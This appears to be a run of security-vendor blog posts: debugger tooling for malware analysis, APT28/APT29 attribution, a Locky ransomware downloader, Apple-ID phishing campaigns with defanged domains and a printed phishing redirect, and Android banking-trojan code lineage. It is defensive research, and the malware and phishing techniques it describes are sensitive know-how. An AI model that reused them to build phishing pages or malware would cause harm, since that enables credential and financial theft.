Figure 10: Result of unpacker script

Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb. The park() builtin stored the original program counter value in the bytes following the jmp instruction. The analyst can return the program to its original location by referring to those bytes and entering the WinDbg command r eip=1DC129B.

Figure 11: Attaching to the parked process

The parked process makes it convenient to snapshot the malware execution VM and repeatedly connect remotely to exercise and annotate different code areas with IDA Pro as the debugger. Because the same OS process can be reused for multiple debug sessions, the memory map announced by the script remains the same across debugging sessions. This means that the annotations created in IDA Pro remain relevant instead of becoming disconnected from the varying data and code locations that would result from the non-deterministic heap addresses returned by VirtualAlloc if the program were simply executed multiple times.


flare-qdb provides a command-line tool to quickly query dynamic binary state without derailing the thought process of an ongoing debugging session. In addition to querying state, flare-qdb can be used to alter program state and simulate new scenarios. For intricate cases, flare-qdb has a scripting interface permitting almost arbitrary manipulation. This can be useful for string decoding, malware unpacking, and general software analysis. Head over to the flare-qdb github page to get started using it.

DHS and FBI Joint Analysis Report Confirms FireEye’s Assessment that Russian Government Likely Sponsors APT28 and APT29

On Dec. 29, 2016, the Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) released a Joint Analysis Report confirming FireEye’s long held public assessment that the Russian government likely sponsors the groups that we track as Advanced Persistent Threat (APT) 28 and APT29. We have tracked and profiled these groups through multiple investigations, endpoint and network detections, and continuous monitoring, allowing us to understand the groups’ malware, operational changes and motivations. This intelligence has been critical to protecting and informing our clients and exposing this threat.

FireEye first publicly announced that the Russian government likely sponsors APT28 in a report released in October 2014. APT28 has pursued military and political targets in the U.S. and globally, including U.S. political organizations, anti-doping agencies, NGOs, foreign and defense ministries, defense attaches, media outlets, and high profile government and private sector entities. Since at least 2007, APT28 has conducted operations using a sophisticated set of malware that employs a flexible, modular framework allowing APT28 to consistently evolve its toolset for future operations. APT28’s operations closely align with Russian military interests and the 2016 breaches, and pursuant public data leaks demonstrate the Russian government's wide-ranging approach to advancing its strategic political interests.

In July 2015, we released a report focusing on a tool used by APT29, malware that we call HAMMERTOSS. In detailing the sophistication and attention to obfuscation evident in HAMMERTOSS, we sought to explain how APT29’s tool development effort defined a clandestine, well-resourced and state-sponsored effort. Additionally, we have observed APT29 target and breach entities including government agencies, universities, law firms and private sector targets. APT29 remains one of the most capable groups that we track, and the group’s past and recent activity is consistent with state espionage.

The Joint Analysis Report also includes indicators for another group we (then iSIGHT Partners) profiled publicly in 2014: Sandworm Team. Since 2009, this group has targeted entities in the energy, transportation and financial services industries. They have deployed destructive malware that impacted the power grid in Ukraine in late 2015 and used related malware to affect a Ukrainian ministry and other financial entities in December 2016. Chiefly characterized by their use of the well-known Black Energy trojan, Sandworm Team has often retrofitted publicly available malware to further their offensive operations. Sandworm Team has exhibited considerable skill and used extensive resources to conduct offensive operations. 

Locky is Back Asking for Unpaid Debts

On June 21, 2016, FireEye’s Dynamic Threat Intelligence (DTI) identified an increase in JavaScript contained within spam emails. FireEye analysts determined the increase was the result of a new Locky ransomware spam campaign.

As shown in Figure 1, Locky spam activity was uninterrupted until June 1, 2016, when it stopped for nearly three weeks. During this period, Locky was the most dominant ransomware distributed in spam email. Now, Locky distribution has returned to the level seen during the first half of 2016.

Figure 1. Locky spam activity in 2016

Figure 2 shows that the majority of Locky spam email detections between June 21 and June 23 of this year were recorded in Japan, the United States and South Korea.

Figure 2. Locky spam by country from June 21 to June 23 of this year

The spam email – a sample shown is shown in Figure 3 – purports to contain an unpaid invoice in an attached ZIP archive. Instead of an invoice, the ZIP archive contains a Locky downloader written in JavaScript.

Figure 3. Locky spam email

JavaScript based Downloader Updates

In this campaign, few updates were seen in both the JavaScript based downloader and the Locky payload.

The JavaScript downloader does the following:

  1. Iterates over an array of URLs hosting the Locky payload.
  2. If a connection to one of the URLs fails, the JavaScript sleeps for 1,000 ms before continuing to iterate over the array of URLs.
  3. Uses a custom XOR-based decryption routine to decrypt the Locky payload.
  4. Ensures the decrypted binary is of a predefined size. In Figure 4 below, the size of the decrypted binary had to be greater than 143,360 bytes and smaller than 153,660 bytes to be executed.

Figure 4. Payload download function in JavaScript

5.     Checks (Figure 5) that the first two bytes of the binary contain the “MZ” header signature.

Figure 5: MZ header check

6.     Executes the decrypted payload by passing it the command line parameter, “123”.

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader. This command line parameter value is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed or compare the command line parameter with the expected value and gracefully exit if the check fails. However in the case of this Locky ransomware, the program does not exit (Figure 6) and the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, then the constant for the decryption routine is incorrect. This results in program crash as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.


As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes







Rotten Apples: Apple-like Malicious Phishing Domains

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information –  including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows user to store passwords and credit card information and have it entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScripts, which was creating the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com , icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique as a simple GET request to any of these domains results in an encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions that include number system conversions, pseudo-random pattern modifiers followed by XOR decoding using a fixed key or password “zycode” for the actual HTML phishing content to be finally created (refer to Figure 15 and Figure 16 in Appendix 1 for complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite is a tool to secure and penetrate web applications: https://portswigger[.]net/burp/.  The Burp session of a user supplying login and password to the HTML form is shown in Figure 3. Here we can see 5 variables (u,p,x,y and cc) and a cookie being sent via HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next the user was presented with an ask3.asp webpage shown in Figure 5.


Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were these Chinese names: “Yu Hu” and “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.].com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. Since January 2016 to the time of writing, the system marked around 240 unique domains that have something to do with Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants with 64 unique emails pointing to qq[.]com, 36 unique Gmail email accounts, and 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in following different ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to such domains and providing credentials to any of the listed domains, whether they receive them via SMS, email or via any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as, and It has also been observed that instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.


Figure 9: Geo-location plot of the IPs for this campaign
Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)...

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)||:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’


100%[============================================================================================================>] 203         --.-K/s   in 0s      


2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />


This code redirects the browser to this URL/page:


This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form gets submitted to signin-box-disabled.php and the JavaScript and jQuery creates the page seen in Figure 11, informing the user that the Apple ID provided has been locked and the user must unlock it:

Figure 11: Phishing page suggesting victims to unlock their Apple IDs

, which requests personal information such as name, date of birth, telephone numbers, addresses, credit card details and security questions, as shown in Figure 12. While filling out this form, we observed that the country part of the address drop-down menu only allowed address options from England, Scotland and Wales, suggesting that this attack is targeting these regions onlyClicking on unlock leads the user to the page profile.php .

Figure 12: User information requested by phishing page

On submitting false information on this form, the user would get a page asking to wait while the entered information is confirmed or verified. After a couple of seconds of processing, the page congratulates the user that their Apple ID was successfully unlocked (Figure 13). As seen in Figure 14, the user is then redirected to the authentic Apple page at https://Appleid.Apple[.]com/.

Figure 13: Account verification page displayed by the phishing site

Figure 14: After a successful attack, victims are redirected to the real apple login page

Domain Registration Information

It was observed that all of these domains used the whois privacy protection feature offered by many registrars. This feature enables the registrants to hide their personal and contact information which otherwise is available via the whois service. These domains were registered with the email “contact@privacyprotect[.]org


All these domains (Table 2) were pointing to IPs in the UK, suggesting that they were hosted in the UK.


Cybercriminals are targeting Apple users by launching phishing campaigns focused on stealing Apple IDs, as well as personal, financial and other information. We witnessed a high frequency of these targeted phishing attacks in the first quarter of 2016. A few phishing campaigns were particularly interesting because of their sophisticated evasion techniques (using code encoding and obfuscation), geographical targets, and because the same content was being served across multiple domains, which indicates the same phishing kits were being used.

One campaign we detected in March used sophisticated encoding/encryption techniques to evade phishing detection systems and provided a realistic looking Apple/iCloud interface. The majority of these domains were registered by individuals having email addresses pointing to Chinese services – registrant email, contact and address information points to China. Additionally, the domains were serving phony Apple webpages in Chinese, indicating that they were targeting Chinese users.

The second campaign we detected was launched against Apple users in the UK. This campaign used sophisticated evasion techniques (such as code obfuscation) to evade phishing detection systems and, whenever successful, was able to collect Apple IDs and personal and credit card information from its victims.

Organizations could use the information provided in this blog to protect their users from such sophisticated phishing campaigns by writing signatures for their phishing detection and prevention systems.

Credits and Acknowledgements

Special thanks to Yichong Lin, Jimmy Su, Mary Grace and Gaurav Dalal for their support.

Appendix 1

Figure 15: Obfuscated JavaScript served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operas

Figure 16: Obfuscated JS served by the phishing site. In Green we have highlighted functions with: number system converters, pseudo-random pattern decoders, bit level binary operaters. While in Red we have: XOR decoders.

Appendix 2

Figure 17: Obfuscated JavaScript content served by the site

Figure 18: Deobfuscated HTML content

For more information on phishing, please visit:


A Growing Number of Android Malware Families Believed to Have a Common Origin: A Study Based on Binary Code


On Feb. 19, IBM XForce researchers released an intelligence report [1] stating that the source code for GM Bot was leaked to a crimeware forum in December 2015. GM Bot is a sophisticated Android malware family that emerged in the Russian-speaking cybercrime underground in late 2014. IBM also claimed that several Android malware families recently described in the security community were actually variants of GM Bot, including Bankosy[2], MazarBot[3], and the SlemBunk malware recently described by FireEye[4, 5].

Security vendors may differ in their definition of a malware “variant.” The term may refer to anything from almost identical code with slight modifications, to code that has superficial similarities (such as similar network traffic) yet is otherwise very different.

Using IBM’s reporting, we compared their GM Bot samples to SlemBunk. Based on the disassembled code of these two families, we agree that there are enough code similarities to indicate that GM Bot shares a common origin with SlemBunk. Interestingly, our research led us to identify an earlier malware family named SimpleLocker – the first known file-encryption ransomware on Android [6] – that also shares a common origin with these banking trojan families.

GM Bot and SlemBunk

Our analysis showed that the four GM Bot samples referenced by IBM researchers all share the same major components as SlemBunk. Figure 1 of our earlier report [4] is reproduced here, which shows the major components of SlemBunk and its corresponding class names:

  • ServiceStarter: An Android receiver that will be invoked once an app is launched or the device boots up. Its functionality is to start the monitoring service, MainService, in the background.
  • MainService: An Android service that runs in the background and monitors all running processes on the device. It prompts the user with an overlay view that resembles the legitimate app when that app is launched. This monitoring service also communicates with a remote host by sending the initial device data and notifying of device status and app preferences.
  • MessageReceiver: An Android receiver that handles incoming text messages. In addition to the functionality of intercepting the authentication code from the bank, this component also acts as the bot client for remote command and control (C2).
  • MyDeviceAdminReceiver: A receiver that requests administrator access to the Android device the first time the app is launched. This makes the app more difficult to remove.
  • Customized UI views: Activity classes that present fake login pages that mimic those of the real banking apps or social apps to phish for banking or social account credentials.

Figure 1. Major components of SlemBunk malware family

The first three GM Bot samples have the same package name as our SlemBunk sample. In addition, the GM Bot samples have five of the same major components, including the same component names, as the SlemBunk sample in Figure 1.

The fourth GM Bot sample has a different initial package name, but unpacks the real payload at runtime. The unpacked payload has the same major components as the SlemBunk sample, with a few minor changes on the class names: MessageReceiver replaced with buziabuzia, and MyDeviceAdminReceiver replaced with MDRA.

Figure 2. Code Structure Comparison between GM Bot and SlemBunk

Figure 2 shows the code structure similarity between one GM Bot sample and one SlemBunk sample (SHA256 9425fca578661392f3b12e1f1d83b8307bfb94340ae797c2f121d365852a775e and SHA256 e072a7a8d8e5a562342121408493937ecdedf6f357b1687e6da257f40d0c6b27 for GM Bot and SlemBunk, respectively). From this figure, we can see that the five major components we discussed in our previous post [4] are also present in GM Bot sample. Other common classes include:

  • Main, the launching activity of both samples.
  • MyApplication, the application class that starts before any other activities of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.

Among all the above components and classes, MainService is the most critical one. It is started by class Main at the launching time, keeps working in the background to monitor the top running process, and overlays a phishing view when a victim app (e.g., some mobile banking app) is recognized. To keep MainService running continuously, malware authors added two receivers – ServiceStarter and SDCardServiceStarter – to check its status when particular system events are received. Both GM Bot and SlemBunk samples share the same architecture. Figure 3 shows the major code of class SDCardServiceStarter to demonstrate how GM Bot and SlemBunk use the same mechanism to keep MainService running.

Figure 3. Method onReceive of SDCardServiceStarter for GM Bot and SlemBunk

From this figure, we can see that GM Bot and SlemBunk use almost identical code to keep MainService running. Note that both samples check the country in system locale and avoid starting MainService when they find the country is Russia. The only difference is that GM Bot applies renaming obfuscation to some classes, methods and fields. For example, static variable “MainService;->a” in GM Bot has the same role as static variable “MainService;->isRunning” in SlemBunk. Malware authors commonly use this trick to make their code harder to understand. However this won’t change the fact that the underlying codes share the same origin.

Figure 4 shows the core code of class MainService to demonstrate that GM Bot and SlemBunk actually have the same logic for main service. In Android, when a service is started its onCreate method will be called. In method onCreate of both samples, a static variable is first set to true. In GM Bot, this variable is named “a”, while in SlemBunk it is named “isRunning”. Then both will move forward to read an app particular preference. Note that the preferences in both samples have the same name: “AppPrefs”. The last tasks of these two main services are also the same. Specifically, in order to check whether any victim apps are running, a runnable thread is scheduled. If a victim app is running, a phishing view is overlaid on top of that of the victim app. The only difference here is also on the naming of the runnable thread. Class “d” in GM Bot and class “MainService$2” in SlemBunk are employed respectively to conduct the same credential phishing task.

Figure 4. Class MainService for GM Bot and SlemBunk

In summary, our investigation into the binary code similarities supports IBM’s assertion that GM Bot and SlemBunk share the same origin.

SimpleLocker and SlemBunk

IBM noted that GM Bot emerged in late 2014 in the Russian-speaking cybercrime underground. In our research, we noticed that an earlier piece of Android malware named SimpleLocker also has a code structure similar to SlemBunk and GM Bot. However, SimpleLocker has a different financial incentive: to demand a ransom from the victim. After landing on an Android device, SimpleLocker scans the device for certain file types, encrypts them, and then demands a ransom from the user in order to decrypt the files. Before SimpleLocker’s emergence, there were other types of Android ransomware that would lock the screen; however, SimpleLocker is believed to be the first file-encryption ransomware on Android.

The earliest report on SimpleLocker we identified was published by ESET in June 2014 [6]. However, we found an earlier sample in our malware database from May 2014 (SHA256 edff7bb1d351eafbe2b4af1242d11faf7262b87dfc619e977d2af482453b16cb). The compile date of this app was May 20, 2014. We compared this SimpleLocker sample to one of our SlemBunk samples (SHA256 f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96) using the same methods used to compare GM Bot and SlemBunk.

Figure 5 shows the code structure comparison between these two samples. Note that this SimpleLocker variant also has the major components ServiceStarter and MainService, both used by SlemBunk. However, the purpose of the main service here is not to monitor running apps and provide phishing UIs to steal banking credentials. Instead, SimpleLocker’s main service component scans the device for victim files and calls the file encryption class to encrypt files and demand a ransom. The major differences in the SimpleLocker code are shown in the red boxes: AesCrypt and FileEncryptor. Other common classes include:

  • Main, the launching activity of both samples.
  • SDCardServiceStarter, another receiver that monitors the status of MainService and restarts it when it dies.
  • Tor and OnionKit, third-party libraries for private communication.
  • TorSender, HttpSender and Utils, supporting classes to provide code for CnC communication and for collecting device information.

Figure 5. Code structure comparison between SimpleLocker and SlemBunk samples

Finally, we located another SimpleLocker sample (SHA256 304efc1f0b5b8c6c711c03a13d5d8b90755cec00cac1218a7a4a22b091ffb30b) from July 2014, about two months after the first SimpleLocker sample. This new sample did not use Tor for private communications, but shared four of the five major components as the SlemBunk sample (SHA256: f3341fc8d7248b3d4e58a3ee87e4e675b5f6fc37f28644a2c6ca9c4d11c92b96). Figure 6 shows the code structure comparison between these two samples.

Figure 6. Code structure comparison between SimpleLocker and SlemBunk variants

As we can see in Figure 6, the new SimpleLocker sample used a packaging mechanism similar to SlemBunk, putting HttpSender and Utils into a sub-package named “utils”. It also added two other major components that were originally only seen in SlemBunk: MessageReceiver and MyDeviceAdminReceiver. In total, this SimpleLocker variant shares four out of five major components with SlemBunk.

Figure 7 shows the major code of MessageReceiver in the previous samples to demonstrate that SimpleLocker and SlemBunk use basically the same process and logic to communicate with the CnC server. First, class MessageReceiver registers itself to handle incoming short messages, whose arrival will trigger its method onReceive. As seen from the figure, the main logics here are basically the same for SimpleLocker and SlemBunk. They first read the value of a particular key from app preferences. Note that the names for the key and shared preference are the same for these two different malware families: key is named “CHECKING_NUMBER_DONE” and preference named “AppPrefs”.  The following steps call method retrieveMessage to retrieve the short messages, and then forward the control flow to class SmsProcessor. The only difference here is that SimpleLocker adds one extra method named processControlCommand to forward control flow.

Class SmsProcessor defines the CnC commands supported by the malware families. Looking into class SmsProcessor, we identified more evidence that SimpleLocker and SlemBunk are of the same origin. First, the CnC commands supported by SimpleLocker are actually a subset of those supported by SlemBunk. In SimpleLocker, CnC commands include "intercept_sms_start", "intercept_sms_stop", "control_number" and "send_sms", all of which are also present in SlemBunk sample. What is more, in both SimpleLocker and SlemBunk there is a common prefix “#” before the actual CnC command. This kind of peculiarity is a good indicator that SimpleLocker and SlemBunk share a common origin.

Figure 7. Class MessageReceiver for SimpleLocker and SlemBunk variants

The task of class MyDeviceAdminReceiver is to request device administrator privilege, which makes these malware families harder to remove. SimpleLocker and SlemBunk are also highly similar in this respect, supporting the same set of device admin relevant functionalities.

At this point, we can see that these variants of SimpleLocker and SlemBunk share four out of five major components and share the same supporting utilities. The only difference is in the final payload, with SlemBunk phishing for banking credentials while SimpleLocker encrypts certain files and demands ransom. This leads us to believe that SimpleLocker came from the same original code base as SlemBunk.


Our analysis confirms that several Android malware families share a common origin, and that the first known file-encrypting ransomware for Android – SimpleLocker – is based on the same code as several banking trojans. Additional research may identify other related malware families.

Individual developers in the cybercrime underground have been proficient in writing and customizing malware. As we have shown, malware with specific and varied purposes can be built on a large base of shared code used for common functions such as gaining administrative privileges, starting and restarting services, and CnC communications. This is apparent simply from looking at known samples related to GM Bot – from SimpleLocker that is used for encryption and ransomware, to SlemBunk that is used as a banking Trojan and for credential theft, to the full-featured MazarBot backdoor.

With the leak of the GM Bot source code, the number of customized Android malware families based on this code will certainly increase. Binary code-based study, one of FireEye Labs’ major research tools, can help us better characterize and track malware families and their relationships, even without direct access to the source code. Fortunately, the similarities across these malware families make them easier to identify, ensuring that FireEye customers are well protected.


[1]. Android Malware About to Get Worse: GM Bot Source Code Leaked
[2]. Android.Bankosy: All ears on voice call-based 2FA
[3]. MazarBOT: Top class Android datastealer
[6]. ESET Analyzes Simplocker – First Android File-Encrypting, TOR-enabled Ransomware


FLARE Script Series: flare-dbg Plug-ins


This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known as TINBA to FireEye.



A common technique used by malware is code injection. When malware allocates a memory region to inject code, the created region contains certain characteristics we use to identify them in a process’s memory space. The injectfind plug-in finds and displays information about injected regions of memory from within WinDbg.

The injectfind plug-in is loosely based off the Volatility malfind plug-in. Given a memory dump, the Volatility variant searches memory for injected code and shows an analyst injected code found within processes. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs in a debugger. Similar to malfind, the injectfind plug-in identifies memory regions that may have had code injected and prints a hex dump and a disassembly listing of each identified memory region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of an analyst identifying injected code with injectfind.


After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with Windbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction for NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address is within the first memory region that injectfind identified as injected code. We can quickly conclude that the malware creates a function hook for process creation all from within a Windbg debugger session.



One feature missing from Windbg that is present in OllyDbg and x64dbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.


After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately begins running until one of these memory regions is executed.

Figure 3: membreak plug-in run in Windbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.



Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.


Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 2 shows this same region of data. Note that following each ASCII string containing an API name, there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

